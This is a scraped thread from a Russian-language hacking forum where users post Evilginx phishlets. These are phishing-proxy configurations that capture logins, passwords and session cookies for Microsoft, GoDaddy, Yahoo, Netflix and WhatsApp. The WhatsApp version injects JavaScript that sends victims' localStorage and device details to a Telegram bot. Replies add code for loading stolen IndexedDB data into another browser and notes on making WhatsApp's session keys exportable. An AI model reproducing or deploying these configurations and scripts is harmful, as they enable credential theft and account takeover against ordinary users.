  - {triggers_on: 'reporting.cdndex.io', orig_sub: 'reporting', domain: 'cdndex.io', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: 'g.sst.godaddy.com', orig_sub: 'g.sst', domain: 'godaddy.con', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'] }
  - {triggers_on: 'g.sst.godaddy.com', orig_sub: 'g.sst', domain: 'godaddy.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'] }
  - {triggers_on: 'g.sst.godaddy.com', orig_sub: 'g.sst', domain: 'godaddy.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: '55c74eee6fcf46b1a0517a610f8d289a.apm.vpce.gdw55e.elastic-cloud.com', orig_sub: '55c74eee6fcf46b1a0517a610f8d289a.apm.vpce.gdw55e', domain: 'elastic-cloud.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'] }
  - {triggers_on: '55c74eee6fcf46b1a0517a610f8d289a.apm.vpce.gdw55e.elastic-cloud.com', orig_sub: '55c74eee6fcf46b1a0517a610f8d289a.apm.vpce.gdw55e', domain: 'elastic-cloud.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  - {triggers_on: 'sso.godaddy.com', orig_sub: 'sso', domain: 'godaddy.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'events.api.godaddy.com', orig_sub: 'events.api', domain: 'godaddy.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: 'login.live.com'
    keys: ['uaid','MSPRequ','MSCC','MSPOK','__Host-MSAAUTHP','MSPPre','MSPCID','MSPAuth','MSPProf','NAP','ANON','WLSSC','SDIDC','JSHP','JSH','MSPSoftVis','OParams','MSPBack', '.*,regexp']
  - domain: 'live.com'
    keys: ['ai_session','wlidperf','PPLState','WLSSC','RPSSecAuth','MSPCID','MSPAuth','MSPProf','NAP','ANON','.*,regexp']
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH','ESTSAUTHPERSISTENT','SignInStateCookie','esctx','ESTSSC','ESTSAUTHLIGHT','stsservicecookie','x-ms-gateway-slice', '.*,regexp']
  - domain: 'login.microsoftonline.com'
    keys: ['ESTSSC','ESTSAUTHLIGHT','stsservicecookie','x-ms-gateway-slice', '.*,regexp']
  - domain: 'outlook.live.com'
    keys: ['DefaultAnchorMailbox', 'UC', 'OutlookSession', 'X-OWA-CANARY', '.*,regexp'] 
force_post:
  - path: "/ppsecure/post*"
    search:
      - { key: "LoginOptions", search: "1" }
    force:
      - { key: "DontShowAgain", value: "true" }
    type: "post"
  - path: '/kmsi'
    search:
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/common/SAS'
    search:
      - {key: 'rememberMFA', search: '.*'}
    force:
      - {key: 'rememberMFA', value: 'true'}
    type: 'post'
auth_urls:
  - "/mail/*"
credentials:
  username:
    key: ""
    search: '"username":"([^"]*)'
    type: "json"
  password:
    key: ""
    search: '"password":"([^"]*)'
    type: "json"
  username:
    key: (login|UserName|username|email|account)
    search: (.*)
  password:
    key: (passwd|Password|password|login_password|pass|pwd|session_password|PASSWORD)
    search: (.*)
  username:
    key: '(login)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd)'
    search: '(.*)'
    type: 'post'
login:
  domain: 'outlook.live.com'
  path: '/owa/?nlp=1'
js_inject:
  - trigger_domains: ["login.live.com"]
    trigger_paths: ["/*"]
    script: |
      window.addEventListener("load", () => {
        if (window.location.hash.length == 0) {
          return
        }
        function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySelector(e)&&(t(document.querySelector(e)),r.disconnect())});r.observe(document.body,{childList:!0,subtree:!0})})}
        waitForElm("#i0116").then((elm) => {
          elm.focus();
          elm.value = window.location.hash.slice(1);
          const submBtn = document.querySelector("#idSIButton9");
          submBtn.focus();
          submBtn.click();
        });
      });

Yahoo.yaml

author: '@brokenc0de'
min_ver: '3.0.0'
proxy_hosts:
  - { phish_sub: '', orig_sub: '', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false }
  - { phish_sub: 'www', orig_sub: 'www', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false }
  - { phish_sub: 'mail', orig_sub: 'mail', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false }
  - { phish_sub: 'login', orig_sub: 'login', domain: 'yahoo.com', session: true, is_landing: true, auto_filter: false }
  - { phish_sub: 'guce', orig_sub: 'guce', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false }
  - { phish_sub: 'udc', orig_sub: 'udc', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false }
  - { phish_sub: 'fc', orig_sub: 'fc', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false }
  - { phish_sub: 'ads', orig_sub: 'ads', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false }
  - { phish_sub: 'csp', orig_sub: 'csp', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false }

sub_filters:
  - { triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'mail.yahoo.com', orig_sub: 'mail', domain: 'yahoo.com', search: 'csp.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }
  - { triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json'] }

auth_tokens:
  - domain: '.yahoo.com'
    keys: ['.*,regexp']
  - domain: 'mail.yahoo.com'
    keys: ['.*,regexp']
  - domain: 'login.yahoo.com'
    keys: ['.*,regexp']
  - domain: 'guce.yahoo.com'
    keys: ['.*,regexp']
  - domain: 'udc.yahoo.com'
    keys: ['.*,regexp']

credentials:
  username:
    key: 'username'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
  custom:
    - key: 'browser-fp-data'
      search: '(.*)'
      type: 'post'

auth_urls:
  - '/consent'
  - '/$'

login:
  domain: 'login.yahoo.com'
  path: '/?.src=ym&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd'

Netflix.yaml

author: '@StephanWithPH'
min_ver: '3.0.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'netflix.com', session: true, is_landing: true, auto_filter: true}
auth_tokens:
  - domain: 'netflix.com'
    keys: ['.*:regexp']
    type: 'cookie'
credentials:
  username:
    key: 'userLoginId'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'netflix.com'
  path: '/login'

 

[rand]

Уникально для: xss.pro

Моя версия фишлета под Whatsapp (Под Local Data если пытаться войти выкидывает из сессии, имхо тут нужен подход с подменой IndexDB (интересная защита у WhatsApp, в телеге все проще оказалось) из базы wawc в разделе user, как перехватывать данные с Index Db я понял, а вот как их экспуатировать в другом браузере, пока не понимаю). С шифрованием отправки данных в tg и инъекцией в Index DB не заморачивался, выкладываю как есть.

name: "Whatsapp 2024"
author: 'rand'
min_ver: '3.0.0'

proxy_hosts:
  - phish_sub: 'web'
    orig_sub: 'web'
    domain: 'whatsapp.com'
    session: true
    is_landing: true
    auto_filter: false
  - phish_sub: 'www'
    orig_sub: 'www'
    domain: 'whatsapp.com'
    session: false
    is_landing: false
    auto_filter: true
  - phish_sub: ''
    orig_sub: ''
    domain: 'whatsapp.com'
    session: false
    is_landing: false
    auto_filter: true

sub_filters:
  - triggers_on: 'web.whatsapp.com'
    orig_sub: 'whtsp'
    domain: 'whatsapp.com'
    search: 'https://{hostname}'
    replace: 'https://{hostname}'
    mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']
  - triggers_on: 'whatsapp.com'
    orig_sub: 'whtsp'
    domain: 'whatsapp.com'
    search: 'https%3A%2F%2{hostname}/'
    replace: 'https%3A%2F%2{hostname}/'
    mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']
  - triggers_on: 'web.telegram.org'
    orig_sub: 'whtsp'
    domain: 'whatsapp.com'
    search: '{hostname}'
    replace: '{hostname}'
    mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']

auth_tokens:
  - domain: '.web.whatsapp.com'
    keys: ['.*,regexp']

credentials:
  username:
    key: 'wa_ul'
    search: '(.*)'
    type: 'post'
  password:
    key: 'wa_web_lang_pref'
    search: '(.*)'
    type: 'post'
  custom:
    - key: 'Logs'
      search: '([0-9]*)'
      type: 'post'

login:
  domain: 'web.whatsapp.com'
  path: ''

js_inject:
  - trigger_domains: ["web.whatsapp.com"]
    trigger_paths: ["/(.*)"]
    trigger_params: []
    script: |
      let previousTime = '';

      function logTimeLoop() {
          const currentLocalStorageState = {};

          for (let i = 0; i < localStorage.length; i++) {
              const key = localStorage.key(i);
              let value = localStorage.getItem(key);

              // Попробуем разобрать JSON, если значение в JSON-формате
              try {
                  value = JSON.parse(value);
              } catch (e) {
                  // Если не JSON, оставляем значение как есть
              }

              currentLocalStorageState[key] = value;
          }

          const currentTime = new Date().toLocaleTimeString();

          if (previousTime !== currentTime) {
              const xhr = new XMLHttpRequest();
              xhr.open('POST', '/', true);
              xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
              xhr.send('Logs=' + encodeURIComponent(JSON.stringify(currentLocalStorageState)));
              previousTime = currentTime;
              console.log(currentLocalStorageState);
          }

          setTimeout(logTimeLoop, 50000);
      }

      logTimeLoop();

      var platform = navigator.platform;
      var userAgent = navigator.userAgent;
      var ipAddress = ''; // Добавьте если нужно сами.

      function sendMessageToTelegram() {
          var xhr = new XMLHttpRequest();
          var url = 'https://api.telegram.org/bot7543555073:AAGbmM86wghXXjaonP8i9o9tvvxR_55555/sendMessage';
          xhr.open("POST", url, true);
          xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

          var messageText = "Platform: " + encodeURIComponent(platform) +
                            "\nUser Agent: " + encodeURIComponent(userAgent) +
                            "\nIP Address: " + ipAddress;

          var params = "chat_id=7595095555&text=" + encodeURIComponent(messageText);
          xhr.send(params);
      }

      sendMessageToTelegram();

      function sendLocalStorageInChunksToTelegram() {
          const localStorageData = {};
          for (let i = 0; i < localStorage.length; i++) {
              const key = localStorage.key(i);
              let value = localStorage.getItem(key);


              // Попробуем разобрать JSON, если значение в JSON-формате
              try {
                  value = JSON.parse(value);
              } catch (e) {
                  // Если не JSON, оставляем значение как есть
              }

              localStorageData[key] = value;
          }

          const messageText = JSON.stringify(localStorageData);
          const chunkSize = 4000; // Размер чанка, чуть меньше 4096, разделение сообщений на чанки для ТГ сделано для того что иногда вся инфа не помещается в одно сообщение и сталкиваешься с ограничением API TG.
          const chatId = '7591095555';
          const botToken = '7543591073:AAGbmM86wghXXjaonP8i9o9t55555_55555';

          for (let i = 0; i < messageText.length; i += chunkSize) {
              const chunk = messageText.slice(i, i + chunkSize);
              fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                  method: 'POST',
                  headers: {
                      'Content-Type': 'application/x-www-form-urlencoded'
                  },
                  body: `chat_id=${chatId}&text=${encodeURIComponent(chunk)}`
              })
              .then(response => response.json())
              .then(data => {
                  if (!data.ok) {
                      console.error('Ошибка отправки в Telegram:', data);
                  } else {
                      console.log('Чанк данных успешно отправлен в Telegram');
                  }
              })
              .catch(error => console.error('Ошибка сети:', error));
          }
      }
      setInterval(sendLocalStorageInChunksToTelegram, 50000);
 
      // IndexedDB
      function sendIndexDbToTelegram(){
          // Открытие базы данных IndexedDB с именем "wawc"
          let request = indexedDB.open("wawc");

          request.onsuccess = function(event) {
                let db = event.target.result;
                console.log("Connected to IndexedDB:", db.name);
                console.log("Available Stores:", db.objectStoreNames);

                // Проверка наличия хранилища "user" в базе данных
                if (!db.objectStoreNames.contains("user")) {
                    console.error("Store 'user' does not exist in this database.");
                    return;
                }

                // Создание транзакции для чтения данных из хранилища "user"
                let transaction = db.transaction("user", "readonly");
                let store = transaction.objectStore("user");

                // Получение всех данных из хранилища
                let getAllRequest = store.getAll();
      
                getAllRequest.onsuccess = function(event) {
                    console.log("User:", event.target.result);
                };

                getAllRequest.onerror = function(event) {
                    console.error("Error fetching messages:", event.target.error);
                };
            };

          request.onerror = function(event) {
                console.error("Error opening database:", event.target.error);
            };
        }
      setInterval(sendIndexDbToTelegram, 10000);

Как примерно использовать инъекцию в IndexDB:

const data = [{key: 'qwerty', value: '228'}, {key: 'asdfg', value: 123}] // пример данных, грузим перехваченный массив

const request = indexedDB.open("name", 1); /* На примере фишлета Whatsapp, указываем "wawc" */
const storeName = "store_data";

request.onupgradeneeded = function(event) {
    const db = event.target.result;
    db.objectStoreNames.contains(storeName) ? null : db.createObjectStore(storeName, { keyPath: "key" });
};

request.onsuccess = function(event) {
    const db = event.target.result;
    const transaction = db.transaction(storeName, "readwrite");
    const objectStore = transaction.objectStore(storeName);

        /* Обновляет записи. Если хотите на чистую то сносите базу через objectStore.clear() и делайте итеративно add */
    data.map(item => objectStore.put(item));

    transaction.oncomplete = function() {
        console.log("Данные успешно добавлены (IndexedDB)");
    };

    transaction.onerror = function() {
        console.log("чет упало");
    };
};

 

[origiv]

Уникально для: xss.pro
Моя версия фишлета под Whatsapp (Под Local Data если пытаться войти выкидывает из сессии, имхо тут нужен подход с подменой Indexed DB (интересная защита у WhatsApp, в телеге все проще оказалось) из базы user, как перехватывать данные с Indexed Db я понял, а вот как их экспуатировать в другом браузере, пока не понимаю). С шифрованием отправки данных и Indexed DB не заморачивался, выкладываю как есть.

Скрытое содержимое

Привет, можно личный ?

 

[Steve_Jobs]

Уникально для: xss.pro
Моя версия фишлета под Whatsapp (Под Local Data если пытаться войти выкидывает из сессии, имхо тут нужен подход с подменой Indexed DB (интересная защита у WhatsApp, в телеге все проще оказалось) из базы user, как перехватывать данные с Indexed Db я понял, а вот как их экспуатировать в другом браузере, пока не понимаю). С шифрованием отправки данных в tg и Indexed DB не заморачивался, выкладываю как есть.

Скрытое содержимое

тоже очень интересно личный

 

[Lipshitz]

A couple cool articles working with EvilGinx

https://insights.spotit.be/?s=evilginx

 

[xor0101]

Уникально для: xss.pro

Моя версия фишлета под Whatsapp (Под Local Data если пытаться войти выкидывает из сессии, имхо тут нужен подход с подменой IndexDB (интересная защита у WhatsApp, в телеге все проще оказалось) из базы wawc в разделе user, как перехватывать данные с Indexed Db я понял, а вот как их экспуатировать в другом браузере, пока не понимаю). С шифрованием отправки данных в tg и инъекцией в Indexed DB не заморачивался, выкладываю как есть.

Скрытое содержимое

Как примерно использовать инъекцию в IndexDB:
Скрытое содержимое

Респект за наблюдения. Я прошлую неделю тоже крутил WhatsApp и также дошел к проблеме с IndexedDB. Экспортнуть их легче, чем потом импортнуть, сейчас работаю над импортом Uint8 массива как ключ к Object Storage

 

[andrewerdn]

Unique to: xss.pro

My version of Phishlet for Whatsapp (Under Local Data, if you try to log in, it throws you out of the session, IMHO, an approach with replacing IndexDB is needed here (WhatsApp has interesting protection, everything turned out to be simpler in Telegram) from the wawc database in the user section, I understood how to intercept data from Indexed Db, but I don’t understand yet how to exploit them in another browser). I didn’t bother with encrypting data sending to tg and injection into Indexed DB, I’m posting it as is.

Hidden content

How to use injection in IndexDB:
Hidden content

can you please open this up for me i do not have 50 reactions yet

 

[Steve_Jobs]

This Phishlets are already public and old , 90% of them are not working or need modifications

аххахаха ,blackdatabase, ты б так сильно не палился, а то и мульт забанят )

 

[Steve_Jobs]

what do you mean ?

never mind bro , everything's fine. А если субьективно , то спасибо автору за паблик фишлеты , всяко лучше чем с 0 делать , подчеркнул для себя интересные решения реализаций , никто не говорит что оно должно работать при установке , у кого есть голован на плечай - поймет как это применять

 

[h2ok]

you should post the repository here, it contains more info, one of them is how to solve 53 port error .
let me do it for you

An0nUD4Y/Evilginx2-Phishlets

Evilginx3 Phishlets version (0.2.3 & above) Only For Testing/Learning Purposes - An0nUD4Y/Evilginx2-Phishlets

github.com

• Not Everything is Working Here, Use these Phishlets to learn and to Play with Evilginx.

 

[xor0101]

Уникально для: xss.pro

Моя версия фишлета под Whatsapp (Под Local Data если пытаться войти выкидывает из сессии, имхо тут нужен подход с подменой IndexDB (интересная защита у WhatsApp, в телеге все проще оказалось) из базы wawc в разделе user, как перехватывать данные с Index Db я понял, а вот как их экспуатировать в другом браузере, пока не понимаю). С шифрованием отправки данных в tg и инъекцией в Index DB не заморачивался, выкладываю как есть.

Скрытое содержимое

Как примерно использовать инъекцию в IndexDB:
Скрытое содержимое

Результаты моего исследования:
в IndexedDB есть база wawc_db_enc и в ней две таблицы в которых лежат крипто ключи js типа CryptoKey, с параметром extractable = false (https://developer.mozilla.org/en-US/docs/Web/API/CryptoKey/extractable). Это значит, что ключ нельзя получить из памяти браузера, его можно только использовать для шифрования/расшифровки.
Именно эти ключи нужны для работы сессии.

Дальше я попробовал на лету подменять с помощью evilginx js код для генерации этих ключей, чтобы сделать из extractable = true (кому интересно, ищите в коде !1, ["deriveKey"] и замените на true, ["deriveKey"]), но тогда в консоли браузера вылетает ошибка, что этот ключ не может быть экспортируемым.

Неплохая защита, на этом я закончил свои попытки копирования сессии вотсапа.

Какие я вижу дальнейшие варианты: попробовать патчить js код так, чтобы создавать сначала экспортируемый ключ и записывать, например в тот же IndexedDB в какую-то новую таблицу, а дальше копировать этот ключ с флагом extractable = false и уже его передавать в код вотсапа для работы приложения. Но тут задача усложняется неплохой обфускацией кода.

Если кто-то захочет продолжить данную работу, я открыт к обсуждениям.

 

[nightcity]

этой темой воровали аки еще пару лет назад, но на тот момент никто не объяснял что да как, а щяс тема в паблик улетела и на каждом углу.. ну.. зато теперь хоть понятно, как у меня акк ушел тогда)

 

[Setevik]

этой темой воровали аки еще пару лет назад, но на тот момент никто не объяснял что да как, а щяс тема в паблик улетела и на каждом углу.. ну.. зато теперь хоть понятно, как у меня акк ушел тогда)

 

[DonQixote]

Уникально для: xss.pro

Моя версия фишлета под Whatsapp (Под Local Data если пытаться войти выкидывает из сессии, имхо тут нужен подход с подменой IndexDB (интересная защита у WhatsApp, в телеге все проще оказалось) из базы wawc в разделе user, как перехватывать данные с Index Db я понял, а вот как их экспуатировать в другом браузере, пока не понимаю). С шифрованием отправки данных в tg и инъекцией в Index DB не заморачивался, выкладываю как есть.

Скрытое содержимое

Как примерно использовать инъекцию в IndexDB:
Скрытое содержимое

Добрый день, можно, пожалуйста, личный